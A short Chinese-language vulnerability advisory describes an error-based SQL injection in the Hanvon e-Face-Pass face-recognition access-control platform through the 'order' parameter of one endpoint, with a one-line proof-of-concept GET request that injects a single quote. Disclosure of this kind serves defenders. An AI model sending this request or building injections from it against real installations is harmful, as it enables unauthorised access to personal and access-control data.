汉王e脸通综合管理平台 /manage/firstPeopleOpen/getFirstEmp.do SQL 注入漏洞

2026-04-30 汉王e脸通综合管理平台 PoC Public

Description

汉王e脸通综合管理平台是汉王科技推出的一款基于人脸识别技术的智能门禁管理平台,广泛应用于企业、学校、医院、政府等场景的出入口管理和考勤管理。该平台提供人员管理、门禁控制、访客管理、考勤统计、权限控制等核心功能,支持人脸识别、身份证验证、二维码验证等多种验证方式。汉王e脸通综合管理平台的 /manage/firstPeopleOpen/getFirstEmp.do 接口存在SQL注入漏洞,攻击者可通过order参数构造恶意的SQL语句,利用UPDATEXML函数进行基于错误的SQL注入,获取数据库敏感信息。

PoC

GET /manage/firstPeopleOpen/getFirstEmp.do?recoToken=ZuZBOrvLG8M&page=1&pageSize=10&groupId=1&order=' HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities